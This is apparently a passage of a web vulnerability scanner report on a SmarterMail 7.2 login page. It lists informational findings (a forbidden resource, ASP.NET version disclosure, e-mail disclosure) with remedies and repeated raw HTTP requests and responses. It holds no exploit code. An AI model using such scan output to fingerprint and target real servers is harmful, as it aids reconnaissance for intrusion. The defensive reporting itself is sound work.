<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http%3a%2f%2fwww%2esmartertools%2ecom%2fHelp%2fSmarterMail%2fv7%2fDefault%2easpx%3fp%3d%5fUSR%26v%3d7%2e2%2e3925%26lang%3den%2dUS%26page%3dLoginUser" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fwww\x2esmartertools\x2ecom\x2fHelp\x2fSmarterMail\x2fv7\x2fDefault\x2easpx\x3fp\x3d\x5fUSR\x26v\x3d7\x2e2\x2e3925\x26lang\x3den\x2dUS\x26page\x3dLoginUser','helpwindow',''); return false;" tabindex='5'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='4' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:0px;width:0px;border-width:0px;" />
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="LoginLinks">
<a href='http://www.smartertools.com/smartermail/mail-server-software.aspx' target='_blank'>SmarterMail Free 7.2</a> | <a href='http://www.smartertools.com/smartermail/mail-server-software.aspx' target='_blank'>Windows Mail Server</a> | © 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
</div>
</div>
<script type="text/javascript">
$(document).ready(function() {
$('select').each(function() {
if ($(this).width() > 180) $(this).width(180);
});
}); </script>
</div>
<script type="text/javascript">
//<![CDATA[
WebForm_AutoFocus('ctl00_MPH_txtUserName');Sys.Application.initialize();
//]]>
</script>
</form>
</body>
</html>
Forbidden Resource
Forbidden Resource
1
TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.
Impact
There is no impact resulting from this issue.
|
- /App_Themes/Default/ButtonBarIcons.xml
/App_Themes/Default/ButtonBarIcons.xml CONFIRMED |
Request
GET /App_Themes/Default/ButtonBarIcons.xml HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/App_Themes/Default/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://vulnerable.smartermail.7.x.host:9998/App_Themes/Default/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.0 403 Forbidden
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 00:33:54 GMT
Content-Length: 1208
Connection: Close
<html>
<head>
<title>Forbidden</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: 8pt}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">
<span><h1>Server Error in '/' Application.<hr width=100% size=1 color=silver></h1>
<h2> <i>HTTP Error 403 - Forbidden.</i> </h2></span>
<hr width=100% size=1 color=silver>
<b>Version Information:</b> SmarterTools Web Server 2.0.3925.24451
</font>
</body>
</html>
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 00:33:54 GMT
Content-Length: 1208
Connection: Close
<html>
<head>
<title>Forbidden</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: 8pt}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">
<span><h1>Server Error in '/' Application.<hr width=100% size=1 color=silver></h1>
<h2> <i>HTTP Error 403 - Forbidden.</i> </h2></span>
<hr width=100% size=1 color=silver>
<b>Version Information:</b> SmarterTools Web Server 2.0.3925.24451
</font>
</body>
</html>
ASP.NET Version Disclosure
ASP.NET Version Disclosure
1
TOTAL
INFORMATION
Netsparker identified that the target web server is disclosing ASP.NET version in the HTTP response. This information can help an attacker to develop further attacks and also the system can become an easier target for automated attacks. It was leaked from
X-AspNet-Version banner of HTTP response or default ASP.NET error page.
Impact
An attacker can use disclosed information to harvest specific security vulnerabilities for the version identified. The attacker can also use this information in conjunction with the other vulnerabilities in the application or web server.
Remedy
Apply the following changes on your
web.config file to prevent information leakage by using custom error pages and removing X-AspNet-Version from HTTP responses.
<System.Web>
< httpRuntime enableVersionHeader="false" />
<customErrors mode="On" defaultRedirect="~/error/GeneralError.aspx">
<error statusCode="403" redirect="~/error/Forbidden.aspx" />
<error statusCode="404" redirect="~/error/PageNotFound.aspx" />
<error statusCode="500" redirect="~/error/InternalError.aspx" />
</customErrors>
</System.Web>
Remedy References
|
- /
/ |
Extracted Version
X-AspNet-Version: 2.0.50727
Request
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Accept-Encoding: gzip, deflate,gzip, deflate
Host: vulnerable.smartermail.7.x.host:9998
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Accept-Encoding: gzip, deflate,gzip, deflate
Host: vulnerable.smartermail.7.x.host:9998
Connection: Keep-Alive
Response
HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 00:33:21 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Set-Cookie: ASP.NET_SessionId=rzf1kd55owkddk45aac20t45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3294
Connection: Close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
SmarterMail Login - SmarterMail
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />
<script type="text/javascript">
if (parent.isRoot != null)
parent.location.href = location.href;
if (parent.parent.isRoot != null)
parent.parent.location.href = location.href;
</script>
<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Login/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="Login" dir="ltr">
<form method="post" action="Login.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTI4NzA5NDYyNg8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWAgIFD2QWAmYPZBYGAgMPZBYCAgEPFgIeBFRleHRlZAIFD2QWAgILDxAPFgIfAgULUmVtZW1iZXIgbWVkZGRkAgcPZBYGAgEPEGQQFQIUVXNlIEJyb3dzZXIgTGFuZ3VhZ2UHRW5nbGlzaBUCAAJlbhQrAwJnZxYBZmQCAw8PFgIeC05hdmlnYXRlVVJMBWhodHRwOi8vd3d3LnNtYXJ0ZXJ0b29scy5jb20vSGVscC9TbWFydGVyTWFpbC92Ny9EZWZhdWx0LmFzcHg/cD1fVVNSJnY9Ny4yLjM5MjUmbGFuZz1lbi1VUyZwYWdlPUxvZ2luVXNlcmRkAgcPDxYIHghJbWFnZVVybAUGL3MuZ2lmHgVXaWR0aBsAAAAAAAAAAAEAAAAeBkhlaWdodBsAAAAAAAAAAAEAAAAeBF8hU0ICgANkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUWY3RsMDAkTVBIJGNoa0F1dG9Mb2dpbgUXY3RsMDAkQlBIJGJ0bkVudGVyQ2xpY2sEHZ/xDsa2Ruq8vSjNI7VPml35tg==" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/WebResource.axd?d=sooKBuYSerZQi58Dl6wqJg2&t=633802452069218315" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1'], [], [], 90);
//]]>
</script>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<div id="ctl00_UpdatePanel1">
<div class="CenteredLogin">
<div class="ShadowBox">
<div class="LoginBox">
<div class="LoginTitle">
<div class="RoundedPageTitleLeft">
<div class="RoundedPageTitleRight">
<div class="LoginTitleText">
Login to SmarterMail
</div>
</div>
</div>
</div>
<div class="LoginFrame">
<div class="RoundedBottom">
<div class="RoundedLeft">
<div class="RoundedRight">
<div class="RoundedBottomLeft">
<div class="RoundedBottomRight">
<div id="ctl00_TipTextDiv" class="LoginTipTextContainer">
</div>
<div class="LoginSpacer">
</div>
<div class="LoginContent">
<div class="LoginSetting">
<div class="LoginLabel">
Email Address
(ex. user@example.com)
</div>
<input name="ctl00$MPH$txtUserName" type="text" id="ctl00_MPH_txtUserName" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label></span><br />
</div>
</div>
<div class="LoginButtons">
<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout('__doPostBack(\'ctl00$BPH$LanguageList\',\'\')', 0)" id="ctl00_BPH_LanguageList" tabindex="6">
<option selected="selected" value="">Use Browser Language</option>
<option value="en">English</option>
</select>
<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http%3a%2f%2fwww%2esmartertools%2ecom%2fHelp%2fSmarterMail%2fv7%2fDefault%2easpx%3fp%3d%5fUSR%26v%3d7%2e2%2e3925%26lang%3den%2dUS%26page%3dLoginUser" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fwww\x2esmartertools\x2ecom\x2fHelp\x2fSmarterMail\x2fv7\x2fDefault\x2easpx\x3fp\x3d\x5fUSR\x26v\x3d7\x2e2\x2e3925\x26lang\x3den\x2dUS\x26page\x3dLoginUser','helpwindow',''); return false;" tabindex='5'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='4' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:0px;width:0px;border-width:0px;" />
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="LoginLinks">
<a href='http://www.smartertools.com/smartermail/mail-server-software.aspx' target='_blank'>SmarterMail Free 7.2</a> | <a href='http://www.smartertools.com/smartermail/mail-server-software.aspx' target='_blank'>Windows Mail Server</a> | © 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
</div>
</div>
<script type="text/javascript">
$(document).ready(function() {
$('select').each(function() {
if ($(this).width() > 180) $(this).width(180);
});
}); </script>
</div>
<script type="text/javascript">
//<![CDATA[
WebForm_AutoFocus('ctl00_MPH_txtUserName');Sys.Application.initialize();
//]]>
</script>
</form>
</body>
</html>
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 00:33:21 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Set-Cookie: ASP.NET_SessionId=rzf1kd55owkddk45aac20t45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3294
Connection: Close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
SmarterMail Login - SmarterMail
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />
<script type="text/javascript">
if (parent.isRoot != null)
parent.location.href = location.href;
if (parent.parent.isRoot != null)
parent.parent.location.href = location.href;
</script>
<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Login/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="Login" dir="ltr">
<form method="post" action="Login.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTI4NzA5NDYyNg8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWAgIFD2QWAmYPZBYGAgMPZBYCAgEPFgIeBFRleHRlZAIFD2QWAgILDxAPFgIfAgULUmVtZW1iZXIgbWVkZGRkAgcPZBYGAgEPEGQQFQIUVXNlIEJyb3dzZXIgTGFuZ3VhZ2UHRW5nbGlzaBUCAAJlbhQrAwJnZxYBZmQCAw8PFgIeC05hdmlnYXRlVVJMBWhodHRwOi8vd3d3LnNtYXJ0ZXJ0b29scy5jb20vSGVscC9TbWFydGVyTWFpbC92Ny9EZWZhdWx0LmFzcHg/cD1fVVNSJnY9Ny4yLjM5MjUmbGFuZz1lbi1VUyZwYWdlPUxvZ2luVXNlcmRkAgcPDxYIHghJbWFnZVVybAUGL3MuZ2lmHgVXaWR0aBsAAAAAAAAAAAEAAAAeBkhlaWdodBsAAAAAAAAAAAEAAAAeBF8hU0ICgANkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUWY3RsMDAkTVBIJGNoa0F1dG9Mb2dpbgUXY3RsMDAkQlBIJGJ0bkVudGVyQ2xpY2sEHZ/xDsa2Ruq8vSjNI7VPml35tg==" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/WebResource.axd?d=sooKBuYSerZQi58Dl6wqJg2&t=633802452069218315" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1'], [], [], 90);
//]]>
</script>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<div id="ctl00_UpdatePanel1">
<div class="CenteredLogin">
<div class="ShadowBox">
<div class="LoginBox">
<div class="LoginTitle">
<div class="RoundedPageTitleLeft">
<div class="RoundedPageTitleRight">
<div class="LoginTitleText">
Login to SmarterMail
</div>
</div>
</div>
</div>
<div class="LoginFrame">
<div class="RoundedBottom">
<div class="RoundedLeft">
<div class="RoundedRight">
<div class="RoundedBottomLeft">
<div class="RoundedBottomRight">
<div id="ctl00_TipTextDiv" class="LoginTipTextContainer">
</div>
<div class="LoginSpacer">
</div>
<div class="LoginContent">
<div class="LoginSetting">
<div class="LoginLabel">
Email Address
(ex. user@example.com)
</div>
<input name="ctl00$MPH$txtUserName" type="text" id="ctl00_MPH_txtUserName" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label></span><br />
</div>
</div>
<div class="LoginButtons">
<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout('__doPostBack(\'ctl00$BPH$LanguageList\',\'\')', 0)" id="ctl00_BPH_LanguageList" tabindex="6">
<option selected="selected" value="">Use Browser Language</option>
<option value="en">English</option>
</select>
<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http%3a%2f%2fwww%2esmartertools%2ecom%2fHelp%2fSmarterMail%2fv7%2fDefault%2easpx%3fp%3d%5fUSR%26v%3d7%2e2%2e3925%26lang%3den%2dUS%26page%3dLoginUser" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fwww\x2esmartertools\x2ecom\x2fHelp\x2fSmarterMail\x2fv7\x2fDefault\x2easpx\x3fp\x3d\x5fUSR\x26v\x3d7\x2e2\x2e3925\x26lang\x3den\x2dUS\x26page\x3dLoginUser','helpwindow',''); return false;" tabindex='5'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='4' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:0px;width:0px;border-width:0px;" />
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="LoginLinks">
<a href='http://www.smartertools.com/smartermail/mail-server-software.aspx' target='_blank'>SmarterMail Free 7.2</a> | <a href='http://www.smartertools.com/smartermail/mail-server-software.aspx' target='_blank'>Windows Mail Server</a> | © 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
</div>
</div>
<script type="text/javascript">
$(document).ready(function() {
$('select').each(function() {
if ($(this).width() > 180) $(this).width(180);
});
}); </script>
</div>
<script type="text/javascript">
//<![CDATA[
WebForm_AutoFocus('ctl00_MPH_txtUserName');Sys.Application.initialize();
//]]>
</script>
</form>
</body>
</html>
E-mail Address Disclosure
E-mail Address Disclosure
1
TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.
Impact
E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .
Remedy
Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.
External References
|
- /
/ |
Found E-mails
user@example.com
Request
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Accept-Encoding: gzip, deflate,gzip, deflate
Host: vulnerable.smartermail.7.x.host:9998
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Accept-Encoding: gzip, deflate,gzip, deflate
Host: vulnerable.smartermail.7.x.host:9998
Connection: Keep-Alive
Response
HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 00:33:21 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Set-Cookie: ASP.NET_SessionId=rzf1kd55owkddk45aac20t45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3294
Connection: Close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
SmarterMail Login - SmarterMail
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />
<script type="text/javascript">
if (parent.isRoot != null)
parent.location.href = location.href;
if (parent.parent.isRoot != null)
parent.parent.location.href = location.href;
</script>
<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Login/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="Login" dir="ltr">
<form method="post" action="Login.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTI4NzA5NDYyNg8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWAgIFD2QWAmYPZBYGAgMPZBYCAgEPFgIeBFRleHRlZAIFD2QWAgILDxAPFgIfAgULUmVtZW1iZXIgbWVkZGRkAgcPZBYGAgEPEGQQFQIUVXNlIEJyb3dzZXIgTGFuZ3VhZ2UHRW5nbGlzaBUCAAJlbhQrAwJnZxYBZmQCAw8PFgIeC05hdmlnYXRlVVJMBWhodHRwOi8vd3d3LnNtYXJ0ZXJ0b29scy5jb20vSGVscC9TbWFydGVyTWFpbC92Ny9EZWZhdWx0LmFzcHg/cD1fVVNSJnY9Ny4yLjM5MjUmbGFuZz1lbi1VUyZwYWdlPUxvZ2luVXNlcmRkAgcPDxYIHghJbWFnZVVybAUGL3MuZ2lmHgVXaWR0aBsAAAAAAAAAAAEAAAAeBkhlaWdodBsAAAAAAAAAAAEAAAAeBF8hU0ICgANkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUWY3RsMDAkTVBIJGNoa0F1dG9Mb2dpbgUXY3RsMDAkQlBIJGJ0bkVudGVyQ2xpY2sEHZ/xDsa2Ruq8vSjNI7VPml35tg==" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
